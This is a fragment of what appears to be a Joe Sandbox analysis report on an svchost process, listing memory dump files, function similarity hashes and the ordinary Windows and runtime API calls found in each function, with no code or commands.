                                                                                                                                                                                • Associated: 0000001C.00000002.3270095241.00007FF8A9391000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a92d0000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: M_growmemcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2478243595-0
                                                                                                                                                                                • Opcode ID: 60f437f9f3fa8d7a7bd992af068c621bc581284e16cd2f1ffa3b71f795403b8d
                                                                                                                                                                                • Instruction ID: 99318119829c3fd76310af53292304df1a72e871a24ffdb36bd76a824b642032
                                                                                                                                                                                • Opcode Fuzzy Hash: 60f437f9f3fa8d7a7bd992af068c621bc581284e16cd2f1ffa3b71f795403b8d
                                                                                                                                                                                • Instruction Fuzzy Hash: 5F513072609BC685DB50CF26E4403A973A0FB48BD8F08A136DE8D8B799DF78D4818750
                                                                                                                                                                                APIs
                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF8A7FA0B4E,?,?,?,00007FF8A7FA0E0A), ref: 00007FF8A7FAD8A6
                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF8A7FAD909
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FeaturePresentProcessor_invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1808705829-0
                                                                                                                                                                                • Opcode ID: 80847fa8385ebbbbc0143b331e67d65e3f8be3df02a0ac6a6ba0ca909d87243b
                                                                                                                                                                                • Instruction ID: 9343bc34cb63f86290068047a358683f129d38030011c233368567dc45fc80c4
                                                                                                                                                                                • Opcode Fuzzy Hash: 80847fa8385ebbbbc0143b331e67d65e3f8be3df02a0ac6a6ba0ca909d87243b
                                                                                                                                                                                • Instruction Fuzzy Hash: AC318D21E1F24696FB64AF71A40167D62A4EF89BC4F444434EA8D17ACADF3CEA01E711
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                • Opcode ID: f0d0fc7f0090530ca2f1128ae6b81aac3cec1ea3bd7faafc04bc965e552c45ef
                                                                                                                                                                                • Instruction ID: 46761a48645a68661a06089725e8f0216892bee9e0016d74ddbaf743f1416529
                                                                                                                                                                                • Opcode Fuzzy Hash: f0d0fc7f0090530ca2f1128ae6b81aac3cec1ea3bd7faafc04bc965e552c45ef
                                                                                                                                                                                • Instruction Fuzzy Hash: 7611EF62A19B8195EA208F35E80426DA361FB88BF4F544332EB7E0B7D9DF7CD2419740
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: closesocketsocket
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2760038618-0
                                                                                                                                                                                • Opcode ID: 27b388f8f4bc6737c7fb520ec9b203deaa45030ab93c0741097e461f5fa6597e
                                                                                                                                                                                • Instruction ID: c6af6b4bd2439ec6498854ffb429310daa6b09fc0c3a487a5521a945f7d6216a
                                                                                                                                                                                • Opcode Fuzzy Hash: 27b388f8f4bc6737c7fb520ec9b203deaa45030ab93c0741097e461f5fa6597e
                                                                                                                                                                                • Instruction Fuzzy Hash: D8018112B057C587FF9447B9A4853B917409F58BB5F0C8274CB2D16BD2CF6C48EA8704
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 118556049-0
                                                                                                                                                                                • Opcode ID: f5f960aaf16e6154b6b22e0003423fe2a81c73207f8b97931e9f4dd8c6b60ec4
                                                                                                                                                                                • Instruction ID: c8bba29a122876289620f28f99038f918e761696e0b61300d4c3ef158617c60c
                                                                                                                                                                                • Opcode Fuzzy Hash: f5f960aaf16e6154b6b22e0003423fe2a81c73207f8b97931e9f4dd8c6b60ec4
                                                                                                                                                                                • Instruction Fuzzy Hash: 05F03710E1B907B2FE697E72995117D0290DF487E0F180A31DA3D462C2EE1CB652B222
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                • Opcode ID: 72d2dbb8c05805521502d31913c7e2dcfda900fa91af8ab57f2baabed37d7821
                                                                                                                                                                                • Instruction ID: 084c491d9ffb94be028d0e748b7fa7b4d71047416127beb3be9c15119d115ca8
                                                                                                                                                                                • Opcode Fuzzy Hash: 72d2dbb8c05805521502d31913c7e2dcfda900fa91af8ab57f2baabed37d7821
                                                                                                                                                                                • Instruction Fuzzy Hash: EB318022B0C64286FA58AB6E95A03BD6391EB4DBC4F480435EF4F43785DF2DE4528358
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 918212764-0
                                                                                                                                                                                • Opcode ID: 25735f44b94f3755ade789c92575472402b7a731a04117d4d87ca7f1ecd99190
                                                                                                                                                                                • Instruction ID: fa24e5dfaf0adb6045224d2258a9a5c7ddd6eaa583c9c06cdcaa7942624b605f
                                                                                                                                                                                • Opcode Fuzzy Hash: 25735f44b94f3755ade789c92575472402b7a731a04117d4d87ca7f1ecd99190
                                                                                                                                                                                • Instruction Fuzzy Hash: 0821D221B0A68225FEA49F35A48037D1296DFC4BE0F084235EB2E473C6DE6CE681A300
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                • Opcode ID: 24727585006e46ba29602d07a80e44013b7676f70225eba68d72ee0c1d0c0124
                                                                                                                                                                                • Instruction ID: 58870f05bc42345d9e20dc3cf73fb44699199b8aff88d5dc0f647a37134b6600
                                                                                                                                                                                • Opcode Fuzzy Hash: 24727585006e46ba29602d07a80e44013b7676f70225eba68d72ee0c1d0c0124
                                                                                                                                                                                • Instruction Fuzzy Hash: B5218032A1968296DB618F28E88036D76A0EB94B94F184234E75D876D9DF3CD9029B00
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00007FF8A7FAF000: HeapAlloc.KERNEL32(?,?,00000000,00007FF8A7FAF497), ref: 00007FF8A7FAF055
                                                                                                                                                                                • InitializeCriticalSectionEx.KERNEL32(?,?,00000000,00007FF8A7FBF8B5,?,?,?,?,?,00007FF8A7FC1098), ref: 00007FF8A7FBF5FB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocCriticalHeapInitializeSection
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2538999594-0
                                                                                                                                                                                • Opcode ID: f7f97c36c9f842bfad18129fded1a148e24ae9078067dc0320552559e630e30e
                                                                                                                                                                                • Instruction ID: ae24ce5fc021e562c73a264a19ec74c078ddfdab1399cd0a53dff07bc459a9da
                                                                                                                                                                                • Opcode Fuzzy Hash: f7f97c36c9f842bfad18129fded1a148e24ae9078067dc0320552559e630e30e
                                                                                                                                                                                • Instruction Fuzzy Hash: 2A11CE3272A781A6E6148F25D14016D77A0E745BE0FA88635E76E87BC5CF38E662C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: socket
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 98920635-0
                                                                                                                                                                                • Opcode ID: 4b996f48484ad4d943085cdf321c2f5f56c4e47a803c815960622bae58fff54d
                                                                                                                                                                                • Instruction ID: bea281c6f9ca491e857a8a8bcc93638865422eb01d571bed3974ba28261dd7e6
                                                                                                                                                                                • Opcode Fuzzy Hash: 4b996f48484ad4d943085cdf321c2f5f56c4e47a803c815960622bae58fff54d
                                                                                                                                                                                • Instruction Fuzzy Hash: 00114632B09A4182DB548F5AE184269B3A1FB8DBE4F0C8635DBAD47795CF38D492C704
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: closesocket
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2781271927-0
                                                                                                                                                                                • Opcode ID: f5e5c931f568ed04444b0b36d0a8910c15cb7555877ea71fb8bd6f2f63156bad
                                                                                                                                                                                • Instruction ID: 986e085579ed7eeada2980802a3de08a54d763056280e1605546b7697aa559d6
                                                                                                                                                                                • Opcode Fuzzy Hash: f5e5c931f568ed04444b0b36d0a8910c15cb7555877ea71fb8bd6f2f63156bad
                                                                                                                                                                                • Instruction Fuzzy Hash: EE019611B2865241EA549B1FA44922A9250AF8CBE4F4C5630EF2E47BC9CF2CD4924704
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _beginthreadex
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3014514943-0
                                                                                                                                                                                • Opcode ID: 12d530c60010292d5cdc75557250193eb43d1c307b29f796c6545e99bf5471df
                                                                                                                                                                                • Instruction ID: b66704080a83ae70c7050a79fd891be3621f39c090cad95db4c26c47e4e9afe4
                                                                                                                                                                                • Opcode Fuzzy Hash: 12d530c60010292d5cdc75557250193eb43d1c307b29f796c6545e99bf5471df
                                                                                                                                                                                • Instruction Fuzzy Hash: D9E08C66B1974082AE244B666841025E2816B4C7B1F4C47389E7C863E0DB3CE2924914
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                • Opcode ID: e4fd0e86474e2072aa9de07dd13e97ab6ba6c1518a9ebae92e7671e898c7eb37
                                                                                                                                                                                • Instruction ID: f69c921d23d191062676db6f677cc57e69d6d394e762a6af8f34ed74fc9895a9
                                                                                                                                                                                • Opcode Fuzzy Hash: e4fd0e86474e2072aa9de07dd13e97ab6ba6c1518a9ebae92e7671e898c7eb37
                                                                                                                                                                                • Instruction Fuzzy Hash: 71F01D54F0B207A5FE955F7198552BD52D4DF89BC0F4C9430CA0E8A6D2EE6CE685E220
                                                                                                                                                                                APIs
                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,?,00007FF8A7FB723D,?,?,00000000,00007FF8A7FB72FF,?,?,?,00007FF8A7FAEA7B,?,?,?,00007FF8A7FAE971), ref: 00007FF8A7FAF11E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                • Opcode ID: f53368af172fcdab2dcca4ab2ff6f46b791cb0c12137b06c3e5787fc8ad9be8d
                                                                                                                                                                                • Instruction ID: 1e2dc33a0019770ef9a2f6283fce7533b319441833e0ffb0dffd9dfd9ef79db6
                                                                                                                                                                                • Opcode Fuzzy Hash: f53368af172fcdab2dcca4ab2ff6f46b791cb0c12137b06c3e5787fc8ad9be8d
                                                                                                                                                                                • Instruction Fuzzy Hash: 70F01C11F1F20765FEA46FB1A88167D11C0DF847F0F085634DE2E8A2C1EE2CE641E220
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: setlocale$free$_strdupstrchr$strcmp
                                                                                                                                                                                • String ID: LC_COLLATE$LC_CTYPE$LC_MESSAGES$LC_MONETARY$LC_NUMERIC$LC_TIME$LC_XXX
                                                                                                                                                                                • API String ID: 1324643423-2921774448
                                                                                                                                                                                • Opcode ID: e6c7ad1d9f60df151eb7dc10e28354505227c09a40da8267f4cf20ae9a8186ff
                                                                                                                                                                                • Instruction ID: 47771d90c868ec4dc4df9a16ed7766f050a57d903592d0e8c9a412a42eccd3e3
                                                                                                                                                                                • Opcode Fuzzy Hash: e6c7ad1d9f60df151eb7dc10e28354505227c09a40da8267f4cf20ae9a8186ff
                                                                                                                                                                                • Instruction Fuzzy Hash: 7571F3F174220E55EE898726B8103392253AB45F99FC88639CD3E5A7D4EF3DC49AC310
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
